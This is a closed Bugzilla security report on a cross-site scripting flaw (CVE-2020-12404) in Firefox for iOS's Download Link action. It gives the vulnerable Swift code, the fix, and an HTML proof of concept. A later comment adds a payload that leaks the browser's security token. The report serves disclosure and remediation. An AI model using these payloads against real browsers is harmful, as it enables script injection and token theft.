Closed Bug 1631739 (CVE-2020-12404) Opened 2 years ago Closed 2 years ago

XSS from booby-trapped link on Firefox iOS Download Link Action


(Firefox for iOS :: General, defect, P1)




Tracking Status
fxios 26 ---


(Reporter: vinothsparrow, Assigned: garvan)


(Keywords: csectype-sop, sec-moderate, Whiteboard: [reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high])


(2 files)

Attached file firefox-ios.html

Firefox Version: v24.1
OS: iOS 13.3.1

Issue: Universal XSS on Firefox iOS Download link Action


Firefox iOS user clicks download link in hyperlink option and XSS is triggered on current url, When the hyperlink is in format https://anydomain/','123');alert(document.domain);//

Sample attack scenerio

Steps to reproduce:

  1. Open your iOS firefox browser.
  2. Hold the link until preview popup appears.
  3. Click Download Link
  4. XSS is triggered

Root Cause:

Unescaped url link is being appeneded to the javascript when download action clicked

currentTab.webView?.evaluateJavaScript("'\(url.absoluteString)', '\(UserScriptManager.securityToken)')")


let safeUrl = url.absoluteString.replacingOccurrences(of: "'", with: "%27")
currentTab.webView?.evaluateJavaScript("'\(safeUrl)', '\(UserScriptManager.securityToken)')")

Youtube Unlisted Video:

<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<title>Firefox Universal Download Link XSS POC</title>
<a href="','123');alert(document.domain);//">Download Link in Firefox</a><br><br>

Flags: sec-bounty?

Garvan, can you help prioritize this? I don't have an iOS device but the write-up in comment #0 looks pretty serious.

Group: firefox-core-security → mobile-core-security
Type: task → defect
Component: Security → General
Flags: needinfo?(gkeeley)
Product: Firefox → Firefox for iOS
Flags: needinfo?(gkeeley)

Also with this issue attacker can get security token value in the XSS. Using security token attacker can trigger webkit.messageHandlers events(loginsManagerMessageHandler, printHandler, sessionRestoreHelper, .. etc)

Payload to get security token:

<a href="https://domain/','123');a=eval(decodeURIComponent('(function(a,b){alert(b);})'));a('1">XSS</a>

The above payload will alert the security token.

Assignee: nobody → gkeeley
Priority: -- → P1

landed for v25 of Firefox iOS, the next release

Closed: 2 years ago
Resolution: --- → FIXED
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high]

It's not exactly a "Universal" XSS -- the attacker can't pick any arbitrary victim site. The target site has to be one where users can add links (which is still a large number of popular sites, especial social ones) and a context where the victim will want to download the link rather than click on it to open.

Summary: Universal XSS on Firefox iOS Download Link Action → XSS from booby-trapped link on Firefox iOS Download Link Action
Group: mobile-core-security → core-security-release

CVE for v25 was missed for this bug, assigning it to v26 in order to get picked up by the release notes process.
The bug is the same type of attack, leaking the token, and did have a sec advisory for v25.

tracking-fxios: --- → 26
Attached file advisory.txt

Can you add a CVE to this bug? Thanks

$ ./ 26
Generating advisories for Firefox for iOS Version 26
1631739 is missing a CVE identified....

Flags: needinfo?(dveditz)

Use CVE-2020-12404 for this one.

Alias: CVE-2020-12404
Flags: needinfo?(dveditz)
Flags: sec-bounty? → sec-bounty+
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.